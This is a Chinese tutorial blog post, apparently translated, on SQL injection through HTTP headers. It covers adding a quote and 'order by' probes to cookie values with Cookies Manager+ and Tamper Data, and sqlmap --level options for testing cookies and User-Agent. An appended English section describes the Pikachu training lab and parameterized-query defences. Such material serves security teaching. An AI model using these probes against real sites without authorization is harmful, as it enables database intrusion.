通HTTP header进行sql注入

本文介绍如何利用CookiesManager+和TamperData插件进行SQL注入测试,包括修改HTTP头部的X-Forwarded-For和User-Agent字段,以及通过编辑cookie变量进行SQLi测试的方法。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

原文:http://resources.infosecinstitute.com/sql-injection-http-headers/
[color=blue][b]X-Forwarded-For[/b][/color]
X-Forwarded-For被用于识别一个通过HTTP proxy或负载均衡的HTTP请求的原始IP地址。
[color=blue][b]User-agent[/b][/color]
User-agent用于统计目的以及跟踪协议冲突。第一个空格分隔的部分必须是软件产品名,产品名,一个可选的斜线和版本指示。
不是所有的软件都跟踪user-agent数据,但是有些软件被设计为存储这类信息(例如购物车)

[b]手动测试:使用浏览器插件[/b]
[color=blue]Cookies Manager+[/color]
Cookies Manager+允许查看,编辑以及创建新的cookie,它同时可以显示关于cookie的额外的信息,以及同时编辑多个cookie,备份/恢复他们。
安装完成后,从Tools菜单,选择Cookies Manager+,然后选择关于目标的一个cookie变量
[img]http://dl2.iteye.com/upload/attachment/0101/9044/89735e29-c0b6-3c17-81b4-61a9b088700e.png[/img]
我们将会编辑language_id变量,为了查找SQLi,我们在 language_id值的末尾添加一个单引号
[img]http://dl2.iteye.com/upload/attachment/0101/9046/4459c410-3f6b-394c-bad9-adbf7ecdd759.png[/img]
然后刷新页面或点击该web程序的其他内部链接,应用程序将会提交编辑后的cookie,结果触发一个SQL错误
[img]http://dl2.iteye.com/upload/attachment/0101/9048/fa4dc598-e523-3a1f-9098-9db0f61da69f.png[/img]
[color=blue]Tamper Data:[/color]
安装完成后,从Tools菜单,选择Tamper Data,通过点击Start Tamper来开始篡改数据
当向目标发送请求时,Tamper Data将会弹出一个对话框来询问我们是否需要篡改数据:
[img]http://dl2.iteye.com/upload/attachment/0101/9050/519ceade-0496-35f5-a75b-4af47eb2bdda.png[/img]
点击Tamper,如下图
[img]http://dl2.iteye.com/upload/attachment/0101/9060/5327eebd-0f27-3d77-989e-d3880456d582.png[/img]
如上图我们在cookie变量中添加order by 4,应答正常
[img]http://dl2.iteye.com/upload/attachment/0101/9068/630053db-7de3-3437-b6c5-b2ce9e0cfd19.png[/img]
当我们使用order by 5时,应答如下:
[img]http://dl2.iteye.com/upload/attachment/0101/9072/c2709f30-1b8a-3931-b787-a10727696cb1.png[/img]
所以我们可以推断有4列

[color=blue][b]使用sqlmap自动注入:[/b][/color]
默认sqlmap 测试所有的GET/POST参数。当--level置为2或更高的时候它则测试HTTP cookie头的值。当--level置为3或更高的时候,它则测试User-Agent以及HTTP Referer头。
[table]
|Tested HTTP parameter|Level in sqlmap
|GET|1 (Default)
|POST|1 (Default)
|HTTP Cookie|2 ≥
|HTTP User-Agent|3 ≥
|HTTP Referer|3 ≥
[/table]
### Pikachu Framework HTTP Header Injection Solution and Information #### Understanding the Vulnerability In web applications, developers often retrieve client information through HTTP headers such as `User-Agent`, `Accept`, or custom-defined fields. When backend code processes these headers without proper sanitization, it can lead to SQL injection vulnerabilities[^2]. In the context of the Pikachu training platform, this issue is demonstrated within specific modules designed for learning purposes. #### Demonstrating the Exploit Process To explore how an attacker might exploit a vulnerable application on Pikachu: - Navigate to the **Http Header Injection** module. - Retrieve login credentials by clicking the provided hint button. - After logging in with obtained credentials, intercept the GET request using Burp Suite. - Modify intercepted requests targeting parameters derived from HTTP headers that are processed unsafely by the server-side logic[^1]. #### Implementing Mitigation Strategies Preventing HTTP header-based SQL injections involves several best practices: - Validate all inputs rigorously before processing them further. - Employ prepared statements (parameterized queries) when interacting with databases. - Sanitize user-supplied data effectively to remove any potentially harmful characters or patterns. For example, instead of directly embedding variables into query strings, use parameter binding methods supported by most modern database APIs: ```sql SELECT * FROM users WHERE username = ? AND password = ? ``` This approach ensures that even maliciously crafted input cannot alter the structure of your intended command. #### Enhancing Security Measures Beyond coding standards, additional layers should be added to fortify defenses against attacks like those exploiting weak handling of HTTP headers: - Regular security audits and penetration testing sessions help identify potential weaknesses early. - Educate development teams about secure programming principles regularly. - Keep software up-to-date with patches addressing known issues promptly. --related questions-- 1. What other types of injection flaws exist beyond SQL? 2. How does one configure Burp Suite optimally for intercepting traffic during vulnerability assessments? 3. Can you provide examples of real-world incidents caused by improper management of HTTP headers leading to severe consequences? 4. Are there automated tools available specifically tailored towards detecting SQL injection points related to HTTP headers?
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值